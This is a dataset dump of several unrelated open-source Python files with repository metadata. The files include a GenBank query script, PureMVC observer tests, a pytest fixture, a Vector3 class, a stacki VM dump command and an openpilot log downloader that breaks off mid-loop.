if i == 1:
raise
print('Failed to connect. Retrying')
time.sleep(5) #Wait 5 seconds and try again.
else:
break
Record= Entrez.read(GBSeq)
if int(Record["Count"]) > 0:
print ("%s had %d records in GenBank" %(Line, int(Record["Count"])))
try:
OUT=open(OutFile, 'w')
except:
print ("Can't open file: %s" %(OutFile))
for id in Record["IdList"]:
OUT.write(id + "\n")
| 23.068182 | 82 | 0.619212 | #!/usr/bin/env python
from Bio import Entrez
import os
import argparse
import time
# =====================================================
# Takes a list of species names and queries GenBank for
# that species. If any data are in GenBank, a file is
# written that has the GenBank IDs for that species.
#
# Matt Gitzendanner
# University of Florida
# 3/07/16
#
# =====================================================
#####################
# Options
#
# -i input file with list of species.
# -e email address used for Entrez
# -o Output folder
#####################
#Command-line interface: species list, contact email (NCBI Entrez requires
#one), and the output folder for the per-species GenBank ID files.
parser = argparse.ArgumentParser()
parser.add_argument("-i", help="input file with GenBank accession IDs")
parser.add_argument("-e", help="email address")
parser.add_argument("-o", help="output folder name")
args = parser.parse_args()
infile = args.i
Entrez.email = args.e #sets the email for Entrez.
OutputFolder= args.o
#Function to test for non-zero file size.
def is_non_zero_file(fpath):
    """Return True if *fpath* exists, is a regular file, and is non-empty."""
    # `and` of boolean expressions already yields a bool; the original's
    # `True if ... else False` ternary was redundant.
    return os.path.isfile(fpath) and os.path.getsize(fpath) > 0
#Open the species list; stop with a clear message if it cannot be read.
try:
    IN = open(infile, 'r')
except IOError:
    #Fixed: the original used a Python 2 print statement here
    #(`print "...", infile`), a SyntaxError on Python 3, and then fell
    #through to the loop below, crashing with a NameError on IN.
    print("Can't open file", infile)
    raise SystemExit(1)
for Line in IN:
    Line = Line.strip('\n')
    Organism = Line + "[Orgn]"
    OutFile = os.path.join(OutputFolder, Line.replace(" ", "_"))
    #Check if we've already done this species--look for non-zero output file.
    #This allows rerunning to catch failed runs without redoing all.
    if is_non_zero_file(OutFile):
        continue
    #Up to three attempts, 5 seconds apart, to ride out transient failures.
    for i in range(3, 0, -1):
        try:
            GBSeq = Entrez.esearch(db="nucleotide", term=Organism)  #Get the sequence
        except Exception:
            #Narrowed from a bare `except:` so KeyboardInterrupt still works.
            if i == 1:
                raise
            print('Failed to connect. Retrying')
            time.sleep(5)  #Wait 5 seconds and try again.
        else:
            break
    Record = Entrez.read(GBSeq)
    if int(Record["Count"]) > 0:
        print("%s had %d records in GenBank" % (Line, int(Record["Count"])))
        try:
            OUT = open(OutFile, 'w')
        except IOError:
            print("Can't open file: %s" % (OutFile))
            #Fixed: the original fell through and wrote to an unopened
            #(possibly stale) handle after a failed open.
            continue
        with OUT:
            #`with` closes/flushes the file so is_non_zero_file sees the
            #data on a rerun; loop variable renamed from the builtin `id`.
            for gb_id in Record["IdList"]:
                OUT.write(gb_id + "\n")
| 92 | 0 | 22 |
20887970ba18de0600f5c4a4e74803b5be449f00 | 2,173 | py | Python | tests/patterns/observer.py | scVENUS/puremvc-python-standard-framework | 942bec84220fbc601e8064104199881271ad54c9 | [
"BSD-3-Clause"
] | 12 | 2015-01-26T03:48:00.000Z | 2021-12-13T06:08:28.000Z | tests/patterns/observer.py | scVENUS/puremvc-python-standard-framework | 942bec84220fbc601e8064104199881271ad54c9 | [
"BSD-3-Clause"
] | 4 | 2016-01-25T15:48:35.000Z | 2018-02-19T17:02:20.000Z | tests/patterns/observer.py | scVENUS/puremvc-python-standard-framework | 942bec84220fbc601e8064104199881271ad54c9 | [
"BSD-3-Clause"
] | 12 | 2015-09-02T03:49:52.000Z | 2021-01-24T15:23:59.000Z | import unittest
import puremvc.patterns.observer
class ObserverTest(unittest.TestCase):
    """ObserverTest: Test Observer Pattern"""

    # Scratch slot written by the observer callback so tests can verify
    # that notifications were actually delivered.
    __observerTestVar = None

    def __observerTestMethod(self, note):
        """Observer callback: record the notification body.

        Restored: testObserverAccessors and testObserverConstructor
        register this method as the notify method, but it was missing,
        so those tests raised AttributeError instead of passing.
        """
        self.__observerTestVar = note.getBody()

    def testObserverAccessors(self):
        """ObserverTest: Test Observer Accessors"""
        obsrvr = puremvc.patterns.observer.Observer(None, None)
        obsrvr.setNotifyContext(self)
        obsrvr.setNotifyMethod(self.__observerTestMethod)
        note = puremvc.patterns.observer.Notification('ObserverTestNote', 10)
        obsrvr.notifyObserver(note)
        self.assertEqual(True, self.__observerTestVar == 10)

    def testObserverConstructor(self):
        """ObserverTest: Test Observer Constructor"""
        obsrvr = puremvc.patterns.observer.Observer(self.__observerTestMethod, self)
        note = puremvc.patterns.observer.Notification('ObserverTestNote', 5)
        obsrvr.notifyObserver(note)
        self.assertEqual(True, self.__observerTestVar == 5)

    def testCompareNotifyContext(self):
        """ObserverTest: Test compareNotifyContext()"""
        obsrvr = puremvc.patterns.observer.Observer(self.__observerTestMethod, self)
        negTestObj = object()
        self.assertEqual(False, obsrvr.compareNotifyContext(negTestObj))
        self.assertEqual(True, obsrvr.compareNotifyContext(self))

    def testNameAccessors(self):
        """NotificationTest: Test Name Accessors"""
        note = puremvc.patterns.observer.Notification('TestNote')
        self.assertEqual(True, note.getName() == 'TestNote')

    def testBodyAccessors(self):
        """NotificationTest: Test Body Accessors"""
        note = puremvc.patterns.observer.Notification(None)
        note.setBody(5)
        self.assertEqual(True, note.getBody() == 5)

    def testConstructor(self):
        """NotificationTest: Test Constructor"""
        note = puremvc.patterns.observer.Notification('TestNote', 5, 'TestNoteType')
        self.assertEqual(True, note.getName() == 'TestNote')
        self.assertEqual(True, note.getBody() == 5)
        self.assertEqual(True, note.getType() == 'TestNoteType')
| 31.492754 | 84 | 0.692131 | import unittest
import puremvc.patterns.observer
class ObserverTest(unittest.TestCase):
    """ObserverTest: Test Observer Pattern"""

    # Updated by the observer callback; inspected by the assertions below.
    __observerTestVar = None

    def __observerTestMethod(self, note):
        # Record the body of the delivered notification.
        self.__observerTestVar = note.getBody()

    def testObserverAccessors(self):
        """ObserverTest: Test Observer Accessors"""
        observer = puremvc.patterns.observer.Observer(None, None)
        observer.setNotifyContext(self)
        observer.setNotifyMethod(self.__observerTestMethod)
        notification = puremvc.patterns.observer.Notification('ObserverTestNote', 10)
        observer.notifyObserver(notification)
        self.assertEqual(True, self.__observerTestVar == 10)

    def testObserverConstructor(self):
        """ObserverTest: Test Observer Constructor"""
        observer = puremvc.patterns.observer.Observer(self.__observerTestMethod, self)
        notification = puremvc.patterns.observer.Notification('ObserverTestNote', 5)
        observer.notifyObserver(notification)
        self.assertEqual(True, self.__observerTestVar == 5)

    def testCompareNotifyContext(self):
        """ObserverTest: Test compareNotifyContext()"""
        observer = puremvc.patterns.observer.Observer(self.__observerTestMethod, self)
        unrelated = object()
        self.assertEqual(False, observer.compareNotifyContext(unrelated))
        self.assertEqual(True, observer.compareNotifyContext(self))

    def testNameAccessors(self):
        """NotificationTest: Test Name Accessors"""
        notification = puremvc.patterns.observer.Notification('TestNote')
        self.assertEqual(True, notification.getName() == 'TestNote')

    def testBodyAccessors(self):
        """NotificationTest: Test Body Accessors"""
        notification = puremvc.patterns.observer.Notification(None)
        notification.setBody(5)
        self.assertEqual(True, notification.getBody() == 5)

    def testConstructor(self):
        """NotificationTest: Test Constructor"""
        notification = puremvc.patterns.observer.Notification('TestNote', 5, 'TestNoteType')
        self.assertEqual(True, notification.getName() == 'TestNote')
        self.assertEqual(True, notification.getBody() == 5)
        self.assertEqual(True, notification.getType() == 'TestNoteType')
ff8b27222520e7624ce6d0daf068f367c583623c | 712 | py | Python | tests/conftest.py | giannisterzopoulos/scribd_dl | a7614a6747ea166bac68278dcfb0e05fc5441613 | [
"MIT"
] | 29 | 2018-07-21T05:22:22.000Z | 2022-02-03T17:02:30.000Z | tests/conftest.py | rohrfacu/scribd-dl | a7614a6747ea166bac68278dcfb0e05fc5441613 | [
"MIT"
] | 15 | 2018-03-20T22:19:03.000Z | 2022-03-11T23:18:33.000Z | tests/conftest.py | rohrfacu/scribd-dl | a7614a6747ea166bac68278dcfb0e05fc5441613 | [
"MIT"
] | 8 | 2019-01-05T15:43:45.000Z | 2021-12-28T02:13:40.000Z | #!/usr/bin/env python
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import pytest
from scribd_dl import ScribdDL
# def pytest_addoption(parser):
# parser.addoption("--driver", action="store", default="chrome", help="Type in browser type")
# parser.addoption("--url", action="store", default="https://.../", help="url")
@pytest.fixture(scope='session') # Can be module, session, function, class
| 26.37037 | 97 | 0.658708 | #!/usr/bin/env python
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import pytest
from scribd_dl import ScribdDL
# def pytest_addoption(parser):
# parser.addoption("--driver", action="store", default="chrome", help="Type in browser type")
# parser.addoption("--url", action="store", default="https://.../", help="url")
@pytest.fixture(scope='session')  # Can be module, session, function, class
def scribd(request):
    """Session-wide ScribdDL instance whose browser is closed on teardown."""
    sc = ScribdDL({
        'verbose': True,
        'testing': True,
    })
    sc.start_browser()

    def _teardown():
        sc.close()

    request.addfinalizer(_teardown)
    return sc  # provide the fixture value
| 228 | 0 | 22 |
5e20a42b38ec64f42d467246fa00cb63f2a242d9 | 564 | py | Python | src/loot.py | mbcoalson/AutoDM | de7fbda193cdeb4a08e2b862c1ffa9eda922d64d | [
"MIT"
] | null | null | null | src/loot.py | mbcoalson/AutoDM | de7fbda193cdeb4a08e2b862c1ffa9eda922d64d | [
"MIT"
] | null | null | null | src/loot.py | mbcoalson/AutoDM | de7fbda193cdeb4a08e2b862c1ffa9eda922d64d | [
"MIT"
] | null | null | null | import random | 31.333333 | 80 | 0.673759 | import random
def randmoney(lvl):
    """Print a random coin haul (platinum/gold/silver/copper) scaled by *lvl*."""
    base = 1
    # Draw a random cap per coin type first; platinum only appears above
    # level 3.  (Call order of randint matters for reproducibility.)
    cap_plat = random.randint(0, 5 if lvl > 3 else 0)
    cap_gold = random.randint(0, 50)
    cap_silver = random.randint(0, 100)
    cap_copper = random.randint(0, 500)
    # Then roll the actual amounts within [0, base * cap * lvl].
    plat = random.randint(0, base * cap_plat * lvl)
    gold = random.randint(0, base * cap_gold * lvl)
    silver = random.randint(0, base * cap_silver * lvl)
    copper = random.randint(0, base * cap_copper * lvl)
    print("{}pp, {}gp, {}sp, {}cp".format(plat, gold, silver, copper))
16ef2204ff74181241f1fc0339972740f9e691e9 | 802 | py | Python | tests/test_twotuple_metric.py | ffreemt/text-alignment-benchmarks | 4053347c6b1fd2203a1d4a8d70df840fceab6a5f | [
"MIT"
] | null | null | null | tests/test_twotuple_metric.py | ffreemt/text-alignment-benchmarks | 4053347c6b1fd2203a1d4a8d70df840fceab6a5f | [
"MIT"
] | null | null | null | tests/test_twotuple_metric.py | ffreemt/text-alignment-benchmarks | 4053347c6b1fd2203a1d4a8d70df840fceab6a5f | [
"MIT"
] | null | null | null | """Test twotuple_metric."""
# pylint: disable=invalid-name
from pathlib import Path
from itertools import zip_longest
import pandas as pd
from align_benchmark.twotuple_metric import twotuple_metric
file_loc = "data/para-wh-ch2-benchmark1.xlsx"
if not Path(file_loc).exists():
raise SystemExit(f"File [{file_loc}] does not exist.")
_ = pd.read_excel(file_loc, header=0)[["Unnamed: 1", "Unnamed: 3"]]
_.columns = ["list1", "list2"]
bm1 = _.to_numpy().tolist()
lst = [*zip_longest(range(33), range(36), fillvalue=32)]
def test_twotuple_metric55():
"""Test twotuple_metric 5 5."""
assert twotuple_metric(bm1[5], lst[5]) == 0.5
def test_twotuple_metric_nonnumerical_entry():
"""Test entry that cannot be converted to integer."""
assert twotuple_metric([0, 1], [0, ""]) == 0.0
| 25.870968 | 67 | 0.705736 | """Test twotuple_metric."""
# pylint: disable=invalid-name
from pathlib import Path
from itertools import zip_longest
import pandas as pd
from align_benchmark.twotuple_metric import twotuple_metric
file_loc = "data/para-wh-ch2-benchmark1.xlsx"
if not Path(file_loc).exists():
raise SystemExit(f"File [{file_loc}] does not exist.")
_ = pd.read_excel(file_loc, header=0)[["Unnamed: 1", "Unnamed: 3"]]
_.columns = ["list1", "list2"]
bm1 = _.to_numpy().tolist()
lst = [*zip_longest(range(33), range(36), fillvalue=32)]
def test_twotuple_metric55():
"""Test twotuple_metric 5 5."""
assert twotuple_metric(bm1[5], lst[5]) == 0.5
def test_twotuple_metric_nonnumerical_entry():
"""Test entry that cannot be converted to integer."""
assert twotuple_metric([0, 1], [0, ""]) == 0.0
| 0 | 0 | 0 |
1eacd151a7ba45243c2db4ab388c61f20b5a6046 | 2,251 | py | Python | gamma/nodes.py | davidcpage/gamma | c9df927f66dfffa8a9b73ddd0b10e4533e8717f2 | [
"MIT"
] | 1 | 2018-02-05T17:32:39.000Z | 2018-02-05T17:32:39.000Z | gamma/nodes.py | davidcpage/gamma | c9df927f66dfffa8a9b73ddd0b10e4533e8717f2 | [
"MIT"
] | 2 | 2018-02-20T17:49:11.000Z | 2018-07-17T14:36:07.000Z | gamma/nodes.py | davidcpage/gamma | c9df927f66dfffa8a9b73ddd0b10e4533e8717f2 | [
"MIT"
] | 3 | 2018-02-19T12:36:41.000Z | 2018-07-12T08:46:17.000Z | from collections import namedtuple
from inspect import signature
activation_func = node('ActivationFunc', activation_func=None, inplace=True)
add = node('Add', inplace=True)
add_relu = node('AddRelu', inplace=False)
bn = node('BatchNorm2d', ['num_features'], eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)
clip = node('Clip', min_val=-1, max_val=1, inplace=False, min_value=None, max_value=None)
concat_pool_2d = node('ConcatPool2d')
conv = node('Conv2d', ['in_channels', 'out_channels', 'kernel_size'], stride=1, padding=0, dilation=1, groups=1, bias=True)
correct = node('Correct')
dropout = node('Dropout', p=0.5, inplace=False)
global_avg_pool = node('GlobalAvgPool2d')
identity = node('Identity')
linear = node('Linear', ['in_features', 'out_features'], bias=True)
max_pool = node('MaxPool2d', ['kernel_size'], stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
relu = node('ReLU', inplace=True)
relu6 = node('ReLU6', inplace=True)
x_entropy = node('CrossEntropyLoss', weight=None, size_average=True, ignore_index=-100, reduce=True)
shortcut = node_def(Shortcut)#, ['in_channels', 'out_channels', 'stride'], identity=False)
| 45.938776 | 131 | 0.708574 | from collections import namedtuple
from inspect import signature
class NodeDef(namedtuple('NodeDef', ['type', 'params'])):
    """A node factory: a node type plus the call signature used to bind params."""

    def __call__(self, *args, **kwargs):
        """Bind the call arguments and return a {'type', 'params'} dict."""
        bound = self.params.bind(*args, **kwargs)
        bound.apply_defaults()
        return {'type': self.type, 'params': dict(bound.arguments)}


def node(type_name, arg_names=(), **defaults):
    """Create a NodeDef for a fresh namedtuple type named *type_name*.

    Field order is *arg_names* followed by any default-only keys.
    """
    names = list(arg_names)
    names += [key for key in defaults if key not in names]
    return node_def(namedtuple(type_name, names), **defaults)


def node_def(type, **defaults):
    """Wrap *type* in a NodeDef, overriding signature defaults from *defaults*."""
    sig = signature(type)
    if defaults:
        updated = [
            param.replace(default=defaults[name]) if name in defaults else param
            for name, param in sig.parameters.items()
        ]
        sig = sig.replace(parameters=updated)
    return NodeDef(type, sig)
class Shortcut():
    """Residual-connection placeholder; only the identity case is implemented."""

    def __init__(self, in_channels, out_channels, stride, identity=False):
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.stride = stride
        self.identity = identity

    def __call__(self, x):
        """Return *x* unchanged when identity; otherwise unimplemented."""
        if not self.identity:
            raise NotImplementedError
        return x
# Catalogue of ready-made node factories, one per layer/op type.  Each
# entry is a NodeDef: calling it binds the listed arguments (with the
# given defaults) and returns a {'type': ..., 'params': ...} dict.
activation_func = node('ActivationFunc', activation_func=None, inplace=True)
add = node('Add', inplace=True)
add_relu = node('AddRelu', inplace=False)
bn = node('BatchNorm2d', ['num_features'], eps=1e-5, momentum=0.1, affine=True, track_running_stats=True)
clip = node('Clip', min_val=-1, max_val=1, inplace=False, min_value=None, max_value=None)
concat_pool_2d = node('ConcatPool2d')
conv = node('Conv2d', ['in_channels', 'out_channels', 'kernel_size'], stride=1, padding=0, dilation=1, groups=1, bias=True)
correct = node('Correct')
dropout = node('Dropout', p=0.5, inplace=False)
global_avg_pool = node('GlobalAvgPool2d')
identity = node('Identity')
linear = node('Linear', ['in_features', 'out_features'], bias=True)
max_pool = node('MaxPool2d', ['kernel_size'], stride=None, padding=0, dilation=1, return_indices=False, ceil_mode=False)
relu = node('ReLU', inplace=True)
relu6 = node('ReLU6', inplace=True)
x_entropy = node('CrossEntropyLoss', weight=None, size_average=True, ignore_index=-100, reduce=True)
# Shortcut is wrapped directly from the class, so its __init__ signature
# supplies the parameter list.
shortcut = node_def(Shortcut)#, ['in_channels', 'out_channels', 'stride'], identity=False)
| 868 | 32 | 170 |
d36d0276ec2a4bb063f2e0f21411e1ec075d35a9 | 1,621 | py | Python | common/src/stack/command/stack/commands/dump/vm/__init__.py | sammeidinger/stack | a8085dce179dbe903f65f136f4b63bcc076cc057 | [
"BSD-3-Clause"
] | 123 | 2015-05-12T23:36:45.000Z | 2017-07-05T23:26:57.000Z | common/src/stack/command/stack/commands/dump/vm/__init__.py | sammeidinger/stack | a8085dce179dbe903f65f136f4b63bcc076cc057 | [
"BSD-3-Clause"
] | 177 | 2015-06-05T19:17:47.000Z | 2017-07-07T17:57:24.000Z | common/src/stack/command/stack/commands/dump/vm/__init__.py | sammeidinger/stack | a8085dce179dbe903f65f136f4b63bcc076cc057 | [
"BSD-3-Clause"
] | 32 | 2015-06-07T02:25:03.000Z | 2017-06-23T07:35:35.000Z | # @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack
import stack.commands
from collections import defaultdict
from collections import OrderedDict
from pathlib import Path
import json
class Command(stack.commands.dump.command):
"""
Dump the contents of the stacki database as json.
This command dumps specifically the virtual machine data.
For each host added as a virtual machine, it will dump the
vm specific data including the hypervisor, storage, memory,
and cpu cores
<example cmd='dump vm'>
Dump json data for virtual machines in the stacki database
</example>
<related>load</related>
"""
| 26.57377 | 60 | 0.684146 | # @copyright@
# Copyright (c) 2006 - 2019 Teradata
# All rights reserved. Stacki(r) v5.x stacki.com
# https://github.com/Teradata/stacki/blob/master/LICENSE.txt
# @copyright@
import stack
import stack.commands
from collections import defaultdict
from collections import OrderedDict
from pathlib import Path
import json
class Command(stack.commands.dump.command):
	"""
	Dump the contents of the stacki database as json.
	This command dumps specifically the virtual machine data.
	For each host added as a virtual machine, it will dump the
	vm specific data including the hypervisor, storage, memory,
	and cpu cores
	<example cmd='dump vm'>
	Dump json data for virtual machines in the stacki database
	</example>
	<related>load</related>
	"""

	def run(self, params, args):
		# Gather all storage info up front so the command only has to be
		# run once for every VM host.
		disks_by_host = defaultdict(list)
		for disk in self.call('list.vm.storage'):
			owner = disk['Virtual Machine']
			parent_dir = Path(disk['Location']).parent
			disks_by_host[owner].append(OrderedDict(
				disk_name = disk['Name'],
				disk_type = disk['Type'],
				location = str(parent_dir),
				size = disk['Size'],
				image_name = disk['Image Name'],
				mountpoint = disk['Mountpoint']))

		# Dump each VM host together with its collected disks.
		hosts = []
		for vm in self.call('list.vm', args):
			vm_name = vm['virtual machine']
			hosts.append(OrderedDict(
				name = vm_name,
				hypervisor = vm['hypervisor'],
				memory = vm['memory'],
				cpu = vm['cpu'],
				disks = disks_by_host[vm_name]))

		self.addText(json.dumps(OrderedDict(vm=hosts), indent=8))
| 850 | 0 | 24 |
215020ae42ad538700906eca06b7f4a0544b6577 | 6,250 | py | Python | py-smallpt/core/vector.py | matt77hias/py-smallpt | 906570f789107e5d4c5007ff7858b28d323c0bba | [
"MIT"
] | null | null | null | py-smallpt/core/vector.py | matt77hias/py-smallpt | 906570f789107e5d4c5007ff7858b28d323c0bba | [
"MIT"
] | null | null | null | py-smallpt/core/vector.py | matt77hias/py-smallpt | 906570f789107e5d4c5007ff7858b28d323c0bba | [
"MIT"
] | 2 | 2017-08-03T11:35:42.000Z | 2019-02-02T17:04:43.000Z | from math import isnan, sqrt, pow, floor, ceil, trunc
from math_tools import clamp | 30.940594 | 148 | 0.53216 | from math import isnan, sqrt, pow, floor, ceil, trunc
from math_tools import clamp
class Vector3(object):
    """A 3D vector of floats with componentwise arithmetic helpers.

    Components live in ``self.raw`` as ``[x, y, z]``.  Scalar operands
    broadcast componentwise; ``Vector3`` operands combine componentwise.
    """

    def __init__(self, x = 0.0, y = 0.0, z = 0.0):
        """Initialize the vector, coercing each component to float."""
        self.raw = [float(x), float(y), float(z)]

    def x(self):
        """Return the first component."""
        return self.raw[0]

    def y(self):
        """Return the second component."""
        return self.raw[1]

    def z(self):
        """Return the third component."""
        return self.raw[2]

    def has_NaNs(self):
        """Return True if any component is NaN."""
        return isnan(self.raw[0]) or isnan(self.raw[1]) or isnan(self.raw[2])

    def __copy__(self):
        # Components are immutable floats, so a deep copy doubles as a
        # shallow copy.
        return self.__deepcopy__()

    def __deepcopy__(self, memo=None):
        """Return an independent copy of this vector.

        ``memo`` is accepted (and unused) so ``copy.deepcopy`` can call
        this hook; the original signature lacked it, which made
        ``copy.deepcopy(v)`` raise a TypeError.
        """
        return Vector3(self.raw[0], self.raw[1], self.raw[2])

    def __getitem__(self, i):
        """Return component *i* (0, 1 or 2)."""
        return self.raw[i]

    def __neg__(self):
        return Vector3(-self.raw[0], -self.raw[1], -self.raw[2])

    def __add__(self, x):
        """Add another Vector3, or broadcast-add a scalar."""
        if isinstance(x, Vector3):
            return Vector3(self.raw[0] + x[0], self.raw[1] + x[1], self.raw[2] + x[2])
        else:
            return Vector3(self.raw[0] + x, self.raw[1] + x, self.raw[2] + x)

    def __radd__(self, x):
        return Vector3(x + self.raw[0], x + self.raw[1], x + self.raw[2])

    def __sub__(self, x):
        """Subtract another Vector3, or broadcast-subtract a scalar."""
        if isinstance(x, Vector3):
            return Vector3(self.raw[0] - x[0], self.raw[1] - x[1], self.raw[2] - x[2])
        else:
            return Vector3(self.raw[0] - x, self.raw[1] - x, self.raw[2] - x)

    def __rsub__(self, x):
        return Vector3(x - self.raw[0], x - self.raw[1], x - self.raw[2])

    def __mul__(self, x):
        """Multiply by another Vector3 (Hadamard) or by a scalar."""
        if isinstance(x, Vector3):
            return Vector3(self.raw[0] * x[0], self.raw[1] * x[1], self.raw[2] * x[2])
        else:
            return Vector3(self.raw[0] * x, self.raw[1] * x, self.raw[2] * x)

    def __rmul__(self, x):
        return Vector3(x * self.raw[0], x * self.raw[1], x * self.raw[2])

    # __div__/__rdiv__ are the Python-2 division hooks; kept for
    # backward compatibility alongside the Python-3 __truediv__ pair.
    def __div__(self, x):
        if isinstance(x, Vector3):
            return Vector3(self.raw[0] / x[0], self.raw[1] / x[1], self.raw[2] / x[2])
        else:
            inv_x = 1.0 / x
            return Vector3(self.raw[0] * inv_x, self.raw[1] * inv_x, self.raw[2] * inv_x)

    def __rdiv__(self, x):
        return Vector3(x / self.raw[0], x / self.raw[1], x / self.raw[2])

    def __truediv__(self, x):
        """Divide by another Vector3 (componentwise) or by a scalar."""
        if isinstance(x, Vector3):
            return Vector3(self.raw[0] / x[0], self.raw[1] / x[1], self.raw[2] / x[2])
        else:
            inv_x = 1.0 / x
            return Vector3(self.raw[0] * inv_x, self.raw[1] * inv_x, self.raw[2] * inv_x)

    def __rtruediv__(self, x):
        return Vector3(x / self.raw[0], x / self.raw[1], x / self.raw[2])

    def dot(self, v):
        """Return the dot product with *v*."""
        return self.raw[0] * v[0] + self.raw[1] * v[1] + self.raw[2] * v[2]

    def cross(self, v):
        """Return the cross product with *v* (right-handed)."""
        return Vector3(self.raw[1] * v[2] - self.raw[2] * v[1], self.raw[2] * v[0] - self.raw[0] * v[2], self.raw[0] * v[1] - self.raw[1] * v[0])

    # Comparisons are componentwise; the orderings only hold when every
    # component satisfies the relation.  Defining __eq__ leaves the class
    # unhashable, as in the original.
    def __eq__(self, v):
        return self.raw[0] == v[0] and self.raw[1] == v[1] and self.raw[2] == v[2]

    def __ne__(self, v):
        return self.raw[0] != v[0] or self.raw[1] != v[1] or self.raw[2] != v[2]

    def __lt__(self, v):
        return self.raw[0] < v[0] and self.raw[1] < v[1] and self.raw[2] < v[2]

    def __le__(self, v):
        return self.raw[0] <= v[0] and self.raw[1] <= v[1] and self.raw[2] <= v[2]

    def __gt__(self, v):
        return self.raw[0] > v[0] and self.raw[1] > v[1] and self.raw[2] > v[2]

    def __ge__(self, v):
        return self.raw[0] >= v[0] and self.raw[1] >= v[1] and self.raw[2] >= v[2]

    def min_dimension(self):
        """Return the index of the smallest component (ties go to the later axis)."""
        if self.raw[0] < self.raw[1] and self.raw[0] < self.raw[2]:
            return 0
        if self.raw[1] < self.raw[2]:
            return 1
        return 2

    def max_dimension(self):
        """Return the index of the largest component (ties go to the later axis)."""
        if self.raw[0] > self.raw[1] and self.raw[0] > self.raw[2]:
            return 0
        if self.raw[1] > self.raw[2]:
            return 1
        return 2

    def min_value(self):
        """Return the smallest component value."""
        if self.raw[0] < self.raw[1] and self.raw[0] < self.raw[2]:
            return self.raw[0]
        if self.raw[1] < self.raw[2]:
            return self.raw[1]
        return self.raw[2]

    def max_value(self):
        """Return the largest component value."""
        if self.raw[0] > self.raw[1] and self.raw[0] > self.raw[2]:
            return self.raw[0]
        if self.raw[1] > self.raw[2]:
            return self.raw[1]
        return self.raw[2]

    def norm2_squared(self):
        """Return the squared Euclidean norm."""
        return self.raw[0] * self.raw[0] + self.raw[1] * self.raw[1] + self.raw[2] * self.raw[2]

    def norm2(self):
        """Return the Euclidean norm."""
        return sqrt(self.norm2_squared())

    def normalize(self):
        """Scale this vector to unit length in place and return self.

        Raises ZeroDivisionError for the zero vector.
        """
        a = 1.0 / self.norm2()
        self.raw[0] *= a
        self.raw[1] *= a
        self.raw[2] *= a
        return self

    def __str__(self):
        return '[' + str(self.raw[0]) + ' ' + str(self.raw[1]) + ' ' + str(self.raw[2]) + ']'

    @classmethod
    def apply_unary(cls, f, v, *args, **kwargs):
        """Apply *f* to each component of *v*, returning a new Vector3."""
        return Vector3(f(v.raw[0], *args, **kwargs), f(v.raw[1], *args, **kwargs), f(v.raw[2], *args, **kwargs))

    @classmethod
    def apply_binary(cls, f, v1, v2, *args, **kwargs):
        """Apply *f* to corresponding components of *v1*/*v2*, returning a new Vector3."""
        return Vector3(f(v1.raw[0], v2.raw[0], *args, **kwargs), f(v1.raw[1], v2.raw[1], *args, **kwargs), f(v1.raw[2], v2.raw[2], *args, **kwargs))

    @classmethod
    def sqrt(cls, v):
        return cls.apply_unary(sqrt, v)

    @classmethod
    def pow(cls, v, a):
        return cls.apply_unary(pow, v, a)

    @classmethod
    def abs(cls, v):
        return cls.apply_unary(abs, v)

    @classmethod
    def min(cls, v1, v2):
        """Componentwise minimum of two vectors."""
        return cls.apply_binary(min, v1, v2)

    @classmethod
    def max(cls, v1, v2):
        """Componentwise maximum of two vectors."""
        return cls.apply_binary(max, v1, v2)

    @classmethod
    def round(cls, v):
        return cls.apply_unary(round, v)

    @classmethod
    def floor(cls, v):
        return cls.apply_unary(floor, v)

    @classmethod
    def ceil(cls, v):
        return cls.apply_unary(ceil, v)

    @classmethod
    def trunc(cls, v):
        return cls.apply_unary(trunc, v)

    @classmethod
    def clamp(cls, v, low = 0.0, high = 1.0):
        # `clamp` comes from the project's math_tools module.
        return cls.apply_unary(clamp, v, low=low, high=high)

    @classmethod
    def lerp(cls, a, v1, v2):
        """Linear interpolation: v1 + a * (v2 - v1)."""
        return v1 + a * (v2 - v1)

    @classmethod
    def permute(cls, v, x, y, z):
        """Return a new vector whose components are v[x], v[y], v[z]."""
        return Vector3(v.raw[x], v.raw[y], v.raw[z])
9482f2a095b766caa8ea6bb8d60fb30b7f4d1833 | 880 | py | Python | selfdrive/test/process_replay/download_ref_logs.py | Zapman69/openpilot2 | cbf7d8a4450c4f187e6e4ccc5fc3b1ff9854f888 | [
"MIT"
] | null | null | null | selfdrive/test/process_replay/download_ref_logs.py | Zapman69/openpilot2 | cbf7d8a4450c4f187e6e4ccc5fc3b1ff9854f888 | [
"MIT"
] | 1 | 2021-08-29T13:55:01.000Z | 2021-08-29T14:07:27.000Z | selfdrive/test/process_replay/download_ref_logs.py | Zapman69/openpilot2 | cbf7d8a4450c4f187e6e4ccc5fc3b1ff9854f888 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import requests
from selfdrive.test.process_replay.test_processes import segments
from selfdrive.test.process_replay.process_replay import CONFIGS
BASE_URL = "https://github.com/martinl/openpilot-ci/raw/master/process_replay/"
process_replay_dir = os.path.dirname(os.path.abspath(__file__))
ref_commit = open(os.path.join(process_replay_dir, "ref_commit")).read().strip()
for car_brand, segment in segments:
for cfg in CONFIGS:
cmp_log_url = (BASE_URL + "%s/%s_%s_%s.bz2" % (ref_commit, segment.replace("|", "_"), cfg.proc_name, ref_commit))
cmp_log_fn = os.path.join(process_replay_dir, "%s_%s_%s.bz2" % (segment, cfg.proc_name, ref_commit))
r = requests.get(cmp_log_url)
if r.status_code == 200:
with open(cmp_log_fn, 'wb') as f:
f.write(r.content)
else:
print("Failed to download: " + cmp_log_url)
| 38.26087 | 117 | 0.725 | #!/usr/bin/env python3
import os
import requests
from selfdrive.test.process_replay.test_processes import segments
from selfdrive.test.process_replay.process_replay import CONFIGS
BASE_URL = "https://github.com/martinl/openpilot-ci/raw/master/process_replay/"
process_replay_dir = os.path.dirname(os.path.abspath(__file__))
ref_commit = open(os.path.join(process_replay_dir, "ref_commit")).read().strip()
for car_brand, segment in segments:
for cfg in CONFIGS:
cmp_log_url = (BASE_URL + "%s/%s_%s_%s.bz2" % (ref_commit, segment.replace("|", "_"), cfg.proc_name, ref_commit))
